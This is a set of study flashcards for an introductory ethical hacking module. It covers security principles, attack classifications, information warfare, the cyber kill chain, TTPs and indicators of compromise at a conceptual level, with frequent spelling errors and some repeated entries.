Intro to Ethical Hacking

Question 1

What this Module Covers

Answer 1

Describe the elements of information security

Explain information security attacks and information warfare

Describe cyber kill chain methodology, TTPs, and IoCs

Describe hacking concepts, types, and phases

Explain ethical hacking concepts and scope

Understand information security controls (defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI/ML)

Know about the information security acts and laws

Question 2

Module Flow

Answer 2

1. Information Security Overview
2. Cyber Kill Chain Concepts
3. Hacking Concepts
4. Ethical Hacking concepts
5. Informartion Security Controls
6. Information Security Laws and Standards

Question 3

Major 5 Elements of information Security

Answer 3

Confidentiality

Integrity

Availability

Authenticity

Non-Repudiation

Question 4

Confidentiality

Answer 4

The information or data is acccessible only by an authorized users

Question 5

Integrity

Answer 5

Prevent the data from unauthorized changes

Question 6

Availability

Answer 6

Assuring that the system responsible for transfering, storing and processing an informations are accesible by when required by authorized concerns

Question 7

Authenticity

Answer 7

Ensures the quality of data genuinity

The major role of authenticity is to ensure that user is genuine

Question 8

Non-Repudiation

Answer 8

A guarantee that the sender of a message can’t deny later of sent message

And the reciepient cant deny the reciept of message

Question 9

Confidentiality Breaches

Answer 9

May occur due to improper data handling or hacking attempt

Question 10

Confidentiality controls

Answer 10

Data Clasification
Data Encryption
Proper disposal of equipments(Such as HDD,USB,PC,RAM etc.)

Question 11

Measure of integrity

Answer 11

Checksum:

A number produce by a mathametical fuction to verify that a given block of data is not changed

Question 12

Measures of Availability

Answer 12

Disk Arrays for redundant system and cluster machine

Ativirus software to combat malware

Distributed denial of service prevention systems

Question 13

Authenticity controls

Answer 13

Biometric
Smart Card
Digital certificates

Question 14

Measure of Non-Repudiation

Answer 14

Using a Digital signature to ensure non repudiation

Question 15

Topic covers in information security overview

Answer 15

Elements of information security
Classification of attacks
information warefare

Question 16

Attacks

Answer 16

Motive(Goal) + Method + Vulnerability

Question 17

Attack Motives

Answer 17

Attack motives orginate by targeting a valuable resource either its a data / information processing systems.

System Vulnerabilities allow hackers to attempt an attack using attack techniques

Question 18

Motive behine Information security attack

Answer 18

Distrupting bussiness continuity

Stealing information and manipulating data

Creating fear and chaos by disrupting critical infrastructures

Causing financial loss to the target

Propagating religious or political belifs

Achiving state military objectives

Damaging the reputation of the target

Taking revenge

Demanding ransom

Question 19

Clasification of Attack

Answer 19

Passive Attacks
Active Attacks
Close-in-Attacks
Insider Attacks
Distribution Attacks

Question 20

Passive Attacks

Answer 20

Intercepting, monitoring network traffics,data flow on the target network

Not tamper with the data

Attacker perform reconnaissance on network trafic using sniffer

This kind of attack is difficult to detect ,becoz attacker not interact with endusers system

Question 21

Example of passive attacks

Answer 21

Sniffing 
eavesdropping
Footprinting
Network traffic analysis
Decryption of weakly encrypted files

Question 22

Active attacks

Answer 22

Tamper with data in transit or break into the security system

Penetrate or infect the target internal networks and gain access to remote system to compromise the internal network

Question 23

Example of Active attacks

Answer 23

DOS

Man-in-Middle

Session Hijackig

SQL Injection

Firewall and IDS attack

Bypassing protection mechanisms

profiling

Malware attacks

Priviledge escalation

Backdoor access

Spoofing attacks

Cryptography attacks

Replay attacks

Password based attacks

XSS attacks

Exploitation of application and os software

DNS and ARP poisoning

Compromised Key attack

Question 24

Close-In Attacks

Answer 24

Attacker performed an attack by physicaly close to the target system or network to gather the information to perform the attack

Question 25

Example of close-IN attack

Answer 25

Social Engineering such as eavesdropping,

Shoulder surfing

dumpster diving

Question 26

Insider Attack

Answer 26

Insider attacks involve using privileged access to voilate rules

or

Intentionally cause a threat to the organizations information

Question 27

Example of Insider attack

Answer 27

Planting keyloggers,
Backdoors,
Malware
Eavesdropping
wiretapping
Theft of physical devices
Data theft and Spoliation
Pod slurping
Social engineering

Question 28

Distributing Attacks

Answer 28

Tamper with hardware or software prior to installation

Question 29

Example of Distributing Attacks

Answer 29

Modification of software or hardware during production

Modification of software or hardware during distribution

Question 30

Information warfare

Answer 30

Refers to use of ICT (information and comunication technologies) for competitive advantages over an opponent

Question 31

Example of Information Warfare

Answer 31

Viruses,
Worms,
Torjan Horses,
Logic Bombs,
Trap doors,
Nanomachines,
Microbes,
Electronic Jamming,
Penetration expolits and tools

Question 32

Martin Libicki Information warfar categories

Answer 32

Command and Control (C2 Warfar)
Intelligence-Based warfare
Electronics Warefare
Psychological warfare
Hacker warefare
Economic warfare
Cyberwarfare

Question 33

Command & Control Warefare

Answer 33

Impact an attacker possesses over a compromised system

Question 34

Intelligence-based warfare

Answer 34

Sensor-based technology that directly corrupts technologies systems

Question 35

Electronic Warfar

Answer 35

Uses radio-electronic and cryptographic techniques to degrade communication

Radio electronic technic attack the physical

Cryptographic technic use bit and bytes to distrupt

Question 36

Psychological warfar

Answer 36

Uses various techniques such as propaganda and terror to demoralize one’s adversary in an attempt to succeed in battle

Question 37

Hacker warfare

Answer 37

Purpose of this warfar can vary from the shutdown of systems, 
Data errors, 
theft of information, 
theft of service,
System monitoring,
False messaging and access to the data

Question 38

Economic Warfar

Answer 38

Can affect the economy of a bussiness or nation by blocking the flow of information

Question 39

Cyberwarfare

Answer 39

Use of information systems against the virtual personas of individuals or groups

It is broadest of all information warfare.

It includes information terrorism, semantic attacks and simula-warfare

Question 40

Inforamtion warfare consist of ?

Answer 40

Defensive and offensive startergies

Question 41

Defencive information warfare

Answer 41

Involves all startergies and action to defend against attacks on ICT assets

Prevention
Deterrence
Alert
Detection
Emergency Preparedness
Response

Question 42

Offensive information warfare

Answer 42

Involves attacks against the ICT assets of an opponent

Web Application Attacks
Web server Attacks
Malware Attacks
MITM Attacks
System Hacking

Question 43

Cyber Kill chain concept

Answer 43

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization

This model helps organizations understand the various possible threats at every stage of an attack and the necessary countermeasures to defend against such attacks.

This models provides security proffessional with a clear insight into the attack startergy used by the adversary

So different level of security controls can be implemented to protect the IT infrastructure of the organization

Question 44

list of Cyber Kill Chain Methodology

Answer 44

Common TTP’s
Behavioral identification of adversaries
Indicator of Compromise

Question 45

Cyber Kill Cain Metodology

Answer 45

Is a intelligence-driven defese for indentify and prevention of malicious intrution activities

Provides grater insight into attack phase

Helps security proffessionals to understand the adversary’s tatics ,techniques, and procedures before hand

Question 46

Cyber kill chain framework developed for

Answer 46

Securing cyberspace based on the concept of military kill chains

Question 47

Cyber Kill chain methed aims to

Answer 47

Actively enhance intrusion detection and response

Cyber kill chain equiped with seven phase protection mechanism to mitigate and reduce cyber threats

Question 48

Understanding cyber kill chain methodology

Answer 48

Helps security proffesionals to leverage controls at different stages of an attack and helps them to prevent the attack before it succeeds.

It also provies greater insignt into the attack phases, which helps in understanding the adversary’s TTPs beforehand

Question 49

Various phase of cyber kill chain methodology

Answer 49

Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command and Control
Action on objective

Question 50

Reconnaissance

Answer 50

An adversary performs reconnaissanceto collect as much information about the targert as possible to probe a weak points before actually attacking.

They look for a information such as publicly availablabe.

Question 51

Activities of the adversary wile reconnaissance

Answer 51

Gathering information about the target organization by searching the internet or through social engineering

Performing analysis of various online activities and publicly available information

gathering information from social networking site and web services

Obtaining information about website visited

Monitoring and analyzing the target organization website

Performing whois, DNS, and network footprinting

Performing scanning to identify open ports and services

Question 52

Weaponization

Answer 52

Analyzes the data collected from reconnaissance to identify the vulnerabilities and techniques that can expolit and gain unauthorized access to the target.

Baced on the vulnerabilities creates a tailored deiverable malicious payload.

Question 53

Activities of the adversary while weponization

Answer 53

Identifying appropriate malware payload on the analysis

Creating a new malware payload or selecting, rescuing, modifying the available malware payloads based on the identified vulnerabilities

Creating a phishing email camoaign

Leveraging expolit kits and botnets

Question 54

Delivery

Answer 54

Transmit the payload to target as an

email,
via a malicious link on websites
through a vulnerable web application
usb drives

Question 55

Delivery

Answer 55

Transmit the payload to target as an

email,
via a malicious link on websites
through a vulnerable web application
usb drives

Question 56

Why delivery is a key stage

Answer 56

That measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not

Question 57

Activities of adversary while performing delivery

Answer 57

Sending phishing emails to employees of the target organization

Distributing USB drives containing malicious payload to employees of the target organization

Performing attacks such as watering hole on the compromised website

Implementing various hacking tools against the operating systems applications and servers of the target organization

Question 58

Explitation

Answer 58

Afte the weapon is transmitted to the intended victim, exploitation triggers the adversary’s malicious code to expolite a vulnerability in the perating system, application, or server n a target system

Question 59

Threats may face by victims while exploiting

Answer 59

Authentication and authorization attack,
Arbitrary code execution,
Physical security threats,
Security misconfiguration

Question 60

Activities of adversary while exploiting

Answer 60

Exploiting software or hardware vulnerabilities to gain remote access to the target system

Question 61

Installation

Answer 61

Adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period

After the injection of malicious code gains the capability to spread the infection to other systems in the network

To hide the precense of malicious activities from security controls ,adversary use various techniques such as encryption

Question 62

Activities of adversary on installation phase

Answer 62

Downloading and installing malicious software such as backdoors

Gaining remote access to the target system

Leveraging various methods to keep backdoor hidden and running

Maintaing access to the target system

Question 63

Command and control

Answer 63

Creates a command and control channel,Which establishes two-way communication between the victim’s system and adversary controlled server to communicate and pass data back forth

Question 64

Activities of adversary on C2 phase

Answer 64

Establishing a 2 way communication channel between victims system to adversary controlled servers

Leveraging channels such as web traffic,email communication, and DNS messages

Applying privilege escalation techniques

Hiding any evidence of compromise using techniques such as encryption

Question 65

Actions on Objectives

Answer 65

The adversary controls the victims system from the remote location and finally accomplishes their intended goals

Advr. gains access to confidentials data,distrub the network,destroy the capability of the target
by gaining access to the network ndcompromised more systems

Also its a launching point for other attacks

Question 66

Tatics, Techniques, and procedures (TTPS)

Answer 66

TTP’s Refers to the patterns of activities and methods associated with specific threat actors or groups of threat actors.

It helpful in analyzing threats and profiling threat actors and can further be used to strengthen the security infrastructure of an organization

Question 67

Tatics

Answer 67

Guideline that describes the way an attacker perfroms their attack from beginning to end

Understanding the tatics used in the last stage of an attack helps in proffiling the threat actor

this profile further helpful to analyze of thecniques and procedures used by the attackes

An attacker may continiously change the TTPs used,so its immportant to constantly review ad update teh tatics used by the APT Groups

Question 68

Techniques

Answer 68

To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration

Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing the threat groups effectively.

the techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation

Techniques used in the middle stages of an attack mostly depend on technical tools for initially escalating privileges on systems that are compromised or performing lateral movements within the target organization’s network

At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target system

The techniques in the last stage of an attack can have both technical and nontechnical aspects

the techniques used for data-stealing are usually based on network technology and encryption

After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear logs files to evade detection

Question 69

Procedures

Answer 69

“Procedures” involve a sequence of actions performed by the threat actors to execute different steps of an attack life cycle

Procedures mainly performed to increase the success rate of an attack and decrease the probability of detection by security mechanisms

In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed

Question 70

Examples of procedures

Answer 70

Collects information about the
target organization;

identifies key targets, employees;

collects their contact details,

identifies vulnerable systems and potential entry points to the target network,

And documents all the collected information,

Threat actors in performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks

Question 71

Adversary behavioral Identification

Answer 71

Adversary behavioral identification involves the identification of the common metthods or techniques followed by an adversary to launch attcacks on or to penetrate an organizations network

It gives security proffessionals insight into upcoming threats and exploits

Question 72

Adversary Behaviors

Answer 72

Internal Reconnaissance
Use of Powershell
Unspecified proxy activities
Use of command-line Interface
HTTP User Agent
Command and control server
Use of DNS Tunneling
Use of Web Shell
Data staging

Question 73

Internal Reconnaissance

Answer 73

Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance.

This includes the enumeration of systems, host, Processes, the execution of various commands to find out information such as the local user contect and system cofiguration, hostname, IP address, ative remote systems, and programs running on the target systems

Question 74

Identify misuse of powershell

Answer 74

Check powershell transcript logs or Windows Event logs

Question 75

Unspecified Proxy Activities

Answer 75

An adversary can create and configure multiple domains pointing to the same host,thus allowing an adversary to switch quickly between the domains to avoid detection

Question 76

Use of Command Line Interface

Answer 76

Adversary can use of command line to browse the files,read file content, modify file content, create new accounts, etc.

Question 77

Use of DNS tunneling

Answer 77

Use DNS tunneling to obfuscate malicius traffic in the legitimate traffic carried by common protocols used in the network.

Question 78

Use of Web shell

Answer 78

Use web sell to manipulate the web server by creating a shell within a website

Question 79

Data Staging

Answer 79

After successful penetration into a targets network, the adversary uses data staging techniques to collect and combine as much data as possible

Collected data may exfiltrate or destroy by adversary

Question 80

Indicator of Compromise (IoCs)

Answer 80

IoC’s are the clues,artifacts and piece of forensic data found on the network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization infrastructue

IoC’s are data feed to intelligence process

Performing frequent IoC’s scan effectively and efficiently detect and respond to evolving cyber threat

Question 81

IoC is an

Answer 81

Automic Indicators
Computed indicators
Behavioral Indicators

Question 82

Atomic indicator

Answer 82

Are cant be segented into smaller parts and whose meaning is not changed in the context of an intrution

i.e: IP addresses and Email address

Question 83

Computed Indicators

Answer 83

Are obtained from the data extracted from a security incident

i.e: Hash values and Regular expressions

Question 84

Behavioral Indicators

Answer 84

Refer to a grouping of both atomic and computed indicators, Combined on the basic of some logic

Question 85

IoC Categories

Answer 85

Email Indicators
Network Indicators
Host-based Indicators
Behavioral Indicators

Question 86

Email Indicators (IoC)

Answer 86

It helps to indicate an attack usually use email service to send malicious data to the target

Indicator provides-
Sender Email address,
email subject,
attachment links

Question 87

Network Indicators

Answer 87

It use to indicate network based attackes performed like C2,Malware delivery,identifying OS ,Browser type,and system info

Network indicator Provides :
URL’s,Domain names and ip address

Question 88

Host-Based Indicators

Answer 88

It used to performing an analysis of infected system within the organizational networks

Hostbased indicaters provide filenames, Filehash, Registry keys, DLL’s and mutex

Question 89

Behavioral Indicators

Answer 89

Used to identify specific behavior related to malicious activities,such as

code injection into memory
running the script of an application

Question 90

Key Indicator of Compromise

Answer 90

Unusal outbound network traffic

Unusual activity through a priviledged user account

Geographical anomalies

Multiple login failures

Increased database read volume

Large HTML response size

Multiple requests for the same file

Mismatched port-application traffic

suspicious registry or system file changes

unusual DNS requests

Unusual DNS requests

Unexpected patching of systems

Signs of distributed denial of service activity

Bundles of data in wrong places

web traffic with superhuman behaviour